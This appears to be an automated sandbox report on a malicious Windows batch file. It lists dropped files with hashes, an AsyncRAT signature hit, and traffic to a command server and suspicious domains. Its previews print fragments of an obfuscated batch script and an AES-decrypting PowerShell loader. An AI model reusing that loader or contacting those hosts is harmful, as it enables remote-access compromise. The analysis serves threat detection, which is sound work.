                              Entropy (8bit):1.232783163157918
                              Encrypted:false
                              SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
                              MD5:71A005B17A2D32C10709277023D447E6
                              SHA1:14754F04007D539159F75D62AACC6A282CAA8D54
                              SHA-256:6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
                              SHA-512:BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
                              Malicious:false
                              Preview:ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.212347920822981
                              Encrypted:false
                              SSDEEP:384:mhZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQe:mOsc6QNqObxKhryS3qes
                              MD5:4E09108C8B12FC472889A87DA99C0808
                              SHA1:2E587E8428EAEA5E6D3DDF48121C196D17FB19C5
                              SHA-256:E7D54C3596EA512C179B5CD24F79252B65FCDB7D3C4F47F768AC6CF3AEB5E3DE
                              SHA-512:989F17EBC39A6388D84D5B00E13F152E117B2E12A2F55D67EF0D00577DEB5B0FDC2DEE7022CEC3150C6AA8A95BD8A223B32C6EB58A364329271D694673CCEDC7
                              Malicious:false
                              Preview:ElfChnk.^.......m.......^.......m...........@;..p>...H,.....................................................................k.t.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.414298413407747
                              Encrypted:false
                              SSDEEP:384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
                              MD5:77D9AFD001F6BBD592C19652D671FEA3
                              SHA1:B87EA73299713B00D44A123C4B48636957EA90CE
                              SHA-256:E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
                              SHA-512:C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
                              Malicious:false
                              Preview:ElfChnk.........................................8...,..t......................................................................>................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):69808
                              Entropy (8bit):4.377655545940823
                              Encrypted:false
                              SSDEEP:384:EoiXLoCGUoMXoiX3oiXaoiXCoiXEFR6nBKSWDXxo+MtSGoRMtXo+bd4okto2wJop:t3IAeIGtaryVpxy
                              MD5:5B5D4EAC095975929C18B2DC53CACED1
                              SHA1:807E6A04AC31A3BC2F7AF38AE5E501D339B8BA7D
                              SHA-256:0F8AD1FBB7DB8A60D226D004E36EBC3E6D5108A7D1853C857E3CBD922BDB67C1
                              SHA-512:1C8DCB546C49ECA7F8CBB01300C9741518BE257F6677B6400EE204D6B433E09D6AEE2F655303AAE752B023B175C8E7C1A9AEC5CFE7AD8294C18CFC466858DC7B
                              Malicious:false
                              Preview:ElfChnk............................................uat6....................................................................-..................d...s...h...................=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...................S4.......:..=.......................................................................F.......&........................"......**...............K.x...........Z..F...............................................................F.............!....6.......... ..K.x......;.}.I...V...x.................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B."......................N...........................................$.N......h.u.b.e.r.t...H.U.B.E.R.T.-.P.C....0......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.r.d.s.s.i.i.o.v.y.b.c.p.m.m...........%
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.422828418420659
                              Encrypted:false
                              SSDEEP:384:wFRzHL4B5W2HuK0PJjfJD9q1G3zm2foww/0w/DOrTKM1d7eRZ9OhPFCgURSLFu/7:GBCjMo46/iP6f/Y14RKe+PH+Yekm
                              MD5:7F6ED6D154200FF5ECC8EAD4F2294FD6
                              SHA1:8BC11AA131EDDAB364110C64C49DAE9A19D5950B
                              SHA-256:79BD0D1963D0872956063A00CA59D53918D27EB2028A05661382C92113AC0F2C
                              SHA-512:435A4471677ADD89AB0D965FA8D12EC4BB0FD7A1C9423927C702E89E18C55BC3FE687EEC55DE4D01A71191A4CF43F18EFB71904F155899C145C5417C17302CFB
                              Malicious:false
                              Preview:ElfChnk.............................................L1........................................................................g.................F...s...h...............n...=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:.......................................................................................................&... ...........................&.......**...............J.Q...........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):79744
                              Entropy (8bit):3.7068711889762676
                              Encrypted:false
                              SSDEEP:768:laG5ZEDByI+ngKIIs4aG5ZEDByI+ngKIIs5G5ZEDByI+ngKIIs2G5ZEDByI+ngKs:TgKE8gKEKgKE1gKE4gKEJgKEaR
                              MD5:29FEBEA7B911968FADA355AB51EE030D
                              SHA1:6C47E2E101448872A42960B051CB27D9AA1D5E5E
                              SHA-256:6DE7B13E9291C205F1EEB9078D3902FC55B6E855FE6CFDFD03E476D40F8A8599
                              SHA-512:9BE2B68FA0F6539E939B71EDB8D7F435256938F98DA084A881F0EC02BB976E7A0B4A19398FCB75120BF42B983E26FCDE5120C3F0362B1509DDB0839C2B717936
                              Malicious:false
                              Preview:ElfChnk.%.......%................................7..,F+.....................................................................Lh..............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**...5............P...........!j..&.......!j....:Tc`.)..h........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.373068424426035
                              Encrypted:false
                              SSDEEP:6144:lFVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:DV1qyWWI/glMM6kF7Pq
                              MD5:A0B86CA76237CA92EBC21604ED2A99F0
                              SHA1:CC71DA4785375D2CA3D3D8B33432EC2CEE134790
                              SHA-256:BB12362BF564B38212E247DF82A18C86A8323F3111140CF7CB2667635E724EFF
                              SHA-512:3CF2A0F66038DFDD907452D9759C1FB0330EA20D080B211420B1C43AC0D3B82FBA1068B4800C9819F6FCB20FD1B394CB07C2EA4DC91637A06929371F34F7B155
                              Malicious:false
                              Preview:regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.,;Y................................................................................................................................................................................................................................................................................................................................................'c,m........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):85
                              Entropy (8bit):4.84935141926561
                              Encrypted:false
                              SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                              MD5:D8C4F9FD5B972AE487170EA993933179
                              SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                              SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                              SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                              Malicious:false
                              Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (2693), with CRLF line terminators
                              Category:dropped
                              Size (bytes):2840
                              Entropy (8bit):5.282056615422855
                              Encrypted:false
                              SSDEEP:48:9JFHDRwRBRBRxhB3AnB3qq8ViQ3lXtvU595f8bLbWp1ccCvuvc1slZaWWiHkKWi/:PFHDRwnL7hBUB6qt6Z9U595f8bZ3vu0Y
                              MD5:35B51E785F1C9C70CB225E3DC65BB389
                              SHA1:B42E4EA404098816AB61D34C1CF0FA781A925B83
                              SHA-256:549563CF6E615F5D9D785B2698A7E97AEA141B7209954DCA2F01C60067550509
                              SHA-512:06C0EEF7C94E81A5DE6E855434056C0E5AA359FC75E192126E915B709C2047B9805A45A7373DFF58A8A50EC2A7712972E55CC4137691D2A333F5D41B24118965
                              Malicious:false
                              Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function PNNxp($qgBgH){.$eOCgk=[System.Security.Cryptography.Aes]::Create();.$eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk=');.$eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A==');.$HrolG=$eOCgk.CreateDecryptor();.$IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length);.$HrolG.Dispose();.$eOCgk.Dispose();.$IcZIb;}function YVagc($qgBgH){.Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', '');.Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktbl
                              File type:DOS batch file, ASCII text, with very long lines (5479), with CRLF line terminators
                              Entropy (8bit):6.008970376557102
                              TrID:
                                File name:1 (2).cmd
                                File size:5'285'337 bytes
                                MD5:64d17cf4e56c0fdc93365eb17914ce39
                                SHA1:4861be8ba1ba6d567f9950390f290bb8b860ccae
                                SHA256:7a83a44720d94be24a8e7745d6871d65afda849c4008ab72511dd5ac38c7378c
                                SHA512:a905de2fdc70937b91584f24358766599f733e7204578b60f64e47d523696d93b14b8aee3b1e5822b6eb0602a248c326c6305d96375f4069f7462cbd1ec4c21c
                                SSDEEP:49152:SW2HHBORwlR4IStoWhlWSPH4HCIhUm9wfE+0yd8aWacLhMrdOe8f8:9
                                TLSH:F036F11F22C7EA3B0A710A487875127FB79C0DCCA427688E1D7467F963BD7E81616368
                                File Content Preview:@echo off..%^%@%COIlBAlHvUDRWINcSFZvWKuWZahIRAnNuSvgrVABydeUMpExUFwUaHASuLlBtCPUHQwenHKXeyWSFAkKvJOmdsNMrCLFJZhVnjmWSAjmUzPCKHnUBBfJODRocJMLWenfqaFwnnRVzCrDDlbJpReiUyhJrYUjNyqQmKlJ%%^%e%QGoKjjlmoKRHdweaekSTVeotIhbmBrTZsHykPyLoWxdncBKclQhztQhMsUbbiZLXRRpvY
                                Icon Hash:9686878b929a9886
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-03T14:55:20.913610+02002035595ET MALWARE Generic AsyncRAT Style SSL Cert1154.216.20.1326969192.168.2.863301TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 3, 2024 14:55:20.226854086 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:20.231822968 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:20.231914997 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:20.237910986 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:20.242785931 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:20.903786898 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:20.903816938 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:20.903877974 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:20.908752918 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:20.913609982 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:21.111813068 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:21.161123037 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:22.200028896 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:22.200059891 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:22.200114965 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:22.201021910 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:22.201045990 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.051754951 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.051846027 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:23.055996895 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:23.056015015 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.056289911 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.060132027 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:23.107403040 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.273268938 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.273338079 CEST44363304195.201.57.90192.168.2.8
                                Oct 3, 2024 14:55:23.273494959 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:23.368804932 CEST63304443192.168.2.8195.201.57.90
                                Oct 3, 2024 14:55:23.544528961 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:23.549355984 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:23.549890041 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:23.554701090 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:23.909399033 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:23.973618984 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:24.070441961 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:24.176755905 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:30.384367943 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:30.426775932 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:30.539252043 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:30.543550968 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:30.548536062 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:30.548916101 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:30.553755999 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.385633945 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.442374945 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.542889118 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.583000898 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.625154972 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.625206947 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.631311893 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631582975 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631616116 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631638050 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.631668091 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631675005 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.631697893 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631748915 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631752968 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.631778002 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631805897 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.631834984 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.631851912 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.635468960 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.635524035 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.635653973 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.635680914 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.635735035 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.636897087 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.636948109 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.636980057 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637006044 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.637031078 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.637032032 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637064934 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637123108 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.637132883 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637198925 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637253046 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.637262106 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637294054 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.637360096 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.640480995 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.641427040 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.642551899 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.642729044 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.642784119 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:31.642836094 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.642889977 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.642951012 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.642978907 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.643012047 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.643074989 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.643104076 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.643135071 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.646497011 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.646526098 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.646574974 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.646603107 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.648124933 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.648153067 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.648180962 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:31.648271084 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.081839085 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.129956007 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:32.289861917 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.318439007 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:32.318517923 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:32.533406973 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.533498049 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.533852100 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.533900023 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.534133911 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.534288883 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.534328938 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.534411907 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.534427881 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.858017921 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:32.911122084 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.008930922 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.052560091 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.076281071 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.076384068 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.081198931 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081257105 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081289053 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081367016 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081396103 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081470013 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081504107 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.081516981 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.402529955 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.458013058 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.554822922 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.583050966 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.583137989 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:33.588046074 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.588076115 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.588141918 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:33.588170052 CEST696963301154.216.20.132192.168.2.8
                                Oct 3, 2024 14:55:58.599034071 CEST633016969192.168.2.8154.216.20.132
                                Oct 3, 2024 14:55:58.604867935 CEST696963301154.216.20.132192.168.2.8
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 3, 2024 14:54:24.731015921 CEST53565761.1.1.1192.168.2.8
                                Oct 3, 2024 14:54:26.387998104 CEST53570261.1.1.1192.168.2.8
                                Oct 3, 2024 14:55:19.912883997 CEST6407553192.168.2.81.1.1.1
                                Oct 3, 2024 14:55:20.220765114 CEST53640751.1.1.1192.168.2.8
                                Oct 3, 2024 14:55:22.189640999 CEST5596253192.168.2.81.1.1.1
                                Oct 3, 2024 14:55:22.197309017 CEST53559621.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 3, 2024 14:55:19.912883997 CEST192.168.2.81.1.1.10x6d9aStandard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
                                Oct 3, 2024 14:55:22.189640999 CEST192.168.2.81.1.1.10x9837Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 3, 2024 14:54:17.156832933 CEST1.1.1.1192.168.2.80xeecfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                Oct 3, 2024 14:54:17.156832933 CEST1.1.1.1192.168.2.80xeecfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
